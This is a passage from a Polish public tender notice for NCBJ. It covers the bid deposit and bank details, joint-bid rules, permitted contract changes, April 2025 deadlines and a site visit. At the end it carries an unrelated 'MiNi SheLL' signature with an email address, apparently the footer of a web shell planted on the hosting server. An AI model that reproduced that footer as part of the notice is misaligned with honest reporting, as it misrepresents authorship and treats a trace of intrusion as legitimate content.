1902 0173 4110 z <br/>dopiskiem „Wadium, nr sprawy EZP.270.19.2025”<br/>Dla wykonawcy zagranicznego: Nr rachunku 95 1020 1026 0000 1902 0173 4110, IBAN PL 95 1020 1026 <br/>0000 1902 0173 4110, SWIFT BPKOPLPW, PKO Bank Polski SA, II Regionalne Centrum Korporacyjne w Warszawie<br/>ul. Nowogrodzka 35/41, 00-950 Warszawa.<br/>1) Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający <br/>zaleca dokonanie przelewu ze stosownym wyprzedzeniem.<br/>2) W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty <br/>zostaje termin uznania kwoty na rachunku Zamawiającego.<br/>3) Nie wniesienie wadium w terminie lub w sposób określony w SWZ spowoduje odrzucenie oferty na <br/>podstawie art. 226 ust. 1 pkt 14 ustawy Pzp<br/>18.5. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1 i 2 ustawy Pzp. <br/>Wykonawca będzie miał możliwość w przypadkach określonych w art. 98 ust. 2 ustawy Pzp wystąpienia <br/>o zwrot wadium, przy czym złożenie wniosku o zwrot wadium spowoduje rozwiązanie stosunku <br/>prawnego Zamawiającego z Wykonawcą i utratę przez Wykonawcę prawa do korzystania ze środków <br/>ochrony prawnej, uregulowanych w Dziale IX ustawy Pzp. <br/>18.6. Zamawiający zwróci wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub <br/>poręczycielowi oświadczenia o zwolnieniu wadium. Zaleca się, aby poręczenie lub gwarancja <br/>wskazywały adres mailowy na jaki Zamawiający winien składać oświadczenie o zwolnieniu wadium, o <br/>którym mowa w art. 98 ust. 5 ustawy Pzp.<br/>18.7. Zamawiający zatrzyma wadium wraz z odsetkami, w przypadkach określonych w art. 98 ust. 6 ustawy <br/>Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może<br/>podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, oraz w art. 7 ust. 1 ustawy o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego5<br/>natomiast spełnianie warunków udziału w postępowaniu Wykonawcy<br/>wykazują zgodnie z pkt 8.2. IDW.<br/>13.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym<br/>mowa w pkt. 10.2 IDW składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu<br/>W przypadku, gdy spełnienie warunku opisanego:<br/>1) w pkt. 8.2 IDW wykazuje co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia<br/>2) w pkt. 8.2 IDW wykonawcy wykazują poprzez poleganie na zdolnościach tych z wykonawców, którzy<br/>wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczają , które, dostawy lub<br/>usługi wykonają poszczególni wykonawcy.<br/>13.5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na<br/>wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe, o których<br/>mowa w pkt 10 IDW, przy czym:<br/>1) podmiotowe środki dowodowe o których mowa w pkt 10.8. IDW składa odpowiednio<br/>Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnianie warunku, w zakresie i na zasadach<br/>opisanych w pkt 8.2 IDW;<br/>2) dokumenty i oświadczenia o których mowa w pkt 10.2. IDW składa każdy z nich. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Dopuszcza się wprowadzenie istotnych zmian do Umowy w następującym zakresie:<br/>1)	przedmiotu Umowy lub/i Wynagrodzenia:<br/>a)	w przypadku konieczności wykonania Robót lub usunięcia wad w celu zmniejszenia zagrożenia, gdy istnieje przypadek wpływający na bezpieczeństwo życia, zdrowia, mienia lub Robót na terenie prac a Zamawiający wydał Wykonawcy Polecenie wykonania robót lub innych czynności w celu wyeliminowania lub zmniejszenia zagrożenia,<br/>b)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w Specyfikacji Technicznej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,<br/>c)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;<br/>d)	ograniczenia przedmiotu zamówienia wynikające w szczególności z przyczyn wymienionych w lit. a)_ - c) powyżej, wraz z proporcjonalnym obniżeniem wynagrodzenia wykonawcy.<br/>2)	terminu realizacji Umowy:<br/>a)	zmian Prawa mających wpływ na Termin wykonania Robót lub sposób prowadzenia Robót, <br/>b)	wstrzymania Robót lub przerwy w ich realizacji, z przyczyn zależnych od Zamawiającego – o czas trwania wstrzymania lub przerwy w ich realizacji,<br/>c)	zlecenia przez Zamawiającego prac lub robót zamiennych, dodatkowych lub zleconych na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp, jeżeli terminy ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu umownego – o czas potrzebny na zrealizowanie tych robót i odpowiedniej zmiany czasu zakresu podstawowego, wykraczający poza pierwotny termin umowny,<br/>d)	wystąpienia Siły wyższej, <br/>e)	w przypadku nałożenia ograniczeń związanych z działaniem koronawirusa (wirusa SARS-CoV-2), przejawiających się jako epidemia, pandemia lub kwarantanna, wojną <br/>na Ukrainie, gdy ich zakres będzie większy niż zakres zaobserwowany w dniu podpisania Umowy, lub zakłóceniem łańcucha dostaw - jeżeli będą one miały rzeczywisty wpływ na realizację Umowy. Zakres ograniczeń zostanie określony i porównany do stanu z dnia podpisania Umowy. <br/>f)	zastosowania innej technologii wykonania Robót spowodowanej w szczególności: wojną na Ukrainie, niedostępnością lub znacznym utrudnieniem pozyskania na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej, wycofania z rynku tych materiałów lub urządzeń lub innym zakłóceniem łańcucha dostaw, pojawieniem się na rynku materiałów lub urządzeń nowszej generacji, pojawieniem się nowszej technologii wykonania zaprojektowanych Robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji, jak również kosztów eksploatacji wykonanego przedmiotu Umowy – adekwatnie do wpływu zmiany wykorzystywanej technologii na termin realizacji robót poprzez jego skrócenie,<br/>g)	w przypadku gdy termin realizacji Etapu określono datą, a ze względu na trwanie procedury udzielenia zamówienia nie zawarto Umowy do dnia 1 listopada 2024 r. Przedłużenie następuje w dniu podpisania Umowy o liczbę dni równą przekroczeniu daty wskazanej w zdaniu pierwszym powyżej.<br/>h)	w przypadku, gdy ze względu na okoliczności nieprzewidziane i niezależne od Wykonawcy, nie mógł dotrzymać terminu pierwotnego, w szczególności w przypadku wystąpienia okoliczności opisanej w pkt 1 lit. b) lub c) niniejszego ustępu. Przedłużenie nastąpi o okres występowania tych okoliczności.<br/>3.	Zamawiający dopuszcza zmianę osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane lub innych ustawach, w szczególności kierowników robót.<br/>4.	W przypadkach określonych w niniejszym paragrafie, Wykonawca jest zobowiązany <br/>do powiadomienia Zamawiającego w terminie 14 dni od zaistnienia tych okoliczności i ich wpływie na Harmonogram lub Koszt realizacji przedmiotu Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ncbj</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający dopuszcza możliwość odbycia wizji lokalnej przez Wykonawcę.<br/>1) Uczestnictwo w wizji nie jest obowiązkowe.<br/>2) Udział w wizji wymaga wcześniejszego zgłoszenia poprzez Platformę zakupową <br/>https://platformazakupowa.pl/pn/ncbj i Formularz „Wyślij wiadomość”, w celu uzyskania <br/>przepustki. Do wejścia na teren NCBJ konieczne jest posiadanie dokumentu potwierdzającego <br/>tożsamość osób biorących udział w wizji.<br/>3) Zamawiający wyznacza termin odbycia wizji lokalnej: w dniu 15.04.2025 r. o godz. 10.00<br/>4) Do wejścia na teren NCBJ konieczne jest uzyskanie przepustki i posiadanie dokumentu <br/>potwierdzającego tożsamość osób biorących udział w wizji. <br/>5) W celu wyrobienia przepustki konieczne jest przekazanie wykazu osób, które będą uczestniczyć w <br/>wizji wraz z podaniem danych: imię i nazwisko, nr dowodu osobistego, które należy przesłać do <br/>Zamawiającego za pośrednictwem platformazakupowa.pl https://platformazakupowa.pl/pn/ncbj i <br/>formularza „Wyślij wiadomość do zamawiającego”.<br/>6) Po odbyciu wizji lokalnej konieczne jest podpisanie protokołu potwierdzającego uczestnictwo w wizji <br/>lokalnej.<br/>2. Wszelkie szczegółowe informacje dotyczące niniejszego postępowania zawarte są w SWZ Tom I-III, która jest dostępna pod<br/>adresem:<br/>http://platformazakupowa.pl/pn/ncbj<br/>Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>Wniosek należy przesłać za pośrednictwem Platformy w zakładce „Pytania/informacje”.

Creat By MiNi SheLL
Email: jattceo@gmail.com